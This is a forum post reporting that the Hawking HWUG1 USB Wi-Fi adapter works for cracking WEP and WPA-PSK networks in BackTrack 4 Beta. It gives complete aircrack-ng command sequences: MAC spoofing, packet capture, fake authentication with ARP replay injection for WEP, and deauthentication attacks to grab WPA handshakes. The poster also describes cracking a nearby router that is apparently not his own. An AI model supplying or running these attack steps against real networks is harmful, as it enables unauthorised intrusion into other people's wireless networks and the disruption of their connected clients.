Hi, first post here! Just wanted to confirm that the Hawking HWUG1 works perfectly for WEP cracking in BT4 Beta running through VMWare on a Windows 7 64-bit system. Cracked a WRT54GL and a 2WIRE using WEP encryption. Purchased it from Amazon brand new for $31 with free 2-day shipping. Would highly recommend the HWUG1 to anybody looking for a great card with an SMA jack, not to mention in comes with a decent dipole antenna.
NOTE: WPA stuff at the bottom
====================== WEP =====================
====================== WEP =====================
The reason I'm posting this is that it is slightly different then BT3 which required the following command to work properly:
Code:
iwconfig rausb0 rate 1M
This command is no longer needed (unless the router is in a different mode, but through my test I never used this and it worked great on both routers one in 11b mode and the other in 54g mode). Also, I notice the device is named "rausb0", but in BT4b it's the generic "wlan0" I see in most tutorials; hence newbies have one less problem to worry about. Actually after researching the card I tried to use rausb0 in BT4b and it wasn't working so I tried wlan0 and it worked. Also I was pulling my hair out because I could not understand why it wasn't working until I tried it without that command and it worked!
Here are the exact commands I used:
Code:
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
airodump-ng wlan0
airodump-ng -c (channel) -w (filename) --bssid (BSSID) wlan0
No need to explain whats going on here, it's the same as any tutorial out there. So the data starts to rise slowly, in order to provoke it I had to research a bit since nearly all guides used the -3 attack alone which does not work well (at least for the 2 routers i tired). I kept getting a deauth/disassoc packet which stopped me from collecting data quickly, maybe it was the routers but what I did worked and so that's what I'm gonna go by.
Opened up a new tab and did the following:
Code:
aireplay-ng -1 6000 -0 1 -q 10 -e (ESSID) -a (BSSID) -h 00:11:22:33:44:55 wlan0
Okay, this command here will constantly keep us authenticated/associated for 6000 seconds (every 10 seconds), with this we don't have to worry about the deauth/disassoc packets.
Now I opened up a 3rd tab and did the following:
Code:
aireplay-ng -3 -b (BSSID) -h 00:11:22:33:44:55 wlan0
Now go back to the 1st tab and watch the data rise quickly. I hit 60k in about 2 minutes. Then I cracked the file with success!
As you can see the biggest problem was the deauth/disassoc packets that I kept receiving which made provoking the data impossible. Maybe it was the router, maybe it was the device, but I did this for both routers with success so anyone using the HWUG1 should try this out if they are having trouble in BT4b.
BTW, I'm currently working on WPA-PSK cracking but I've run into some problems, will probably post about it later if I run outa ideas.
Happy cracking! 
===================== WPA =====================
===================== WPA =====================
Just successfully cracked a WPA TKIP PSK router nearby... So I'm adding it here instead of making a new thread.
Anyways here are the commands:
Code:
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
airodump-ng wlan0
airodump-ng -c (channel) -w (filename) --bssid (BSSID) wlan0
Samoe old, same old...
Open up a new tab and do the following:
Code:
aireplay-ng -0 2 -a (BSSID) -c (client BSSID) wlan0
also try this one in case you have trouble (actually I caught the handshake on this one but it was probably a fluke or maybe I was impatient):
Code:
aireplay-ng -0 5 -a (BSSID) wlan0
Once you catch the handshake just crack it and your good to go!
Hawking HWUG1 + External SMA Jack [Cracking WEP/WPA WORKS]
Originally Posted by barecool
Posting Permissions
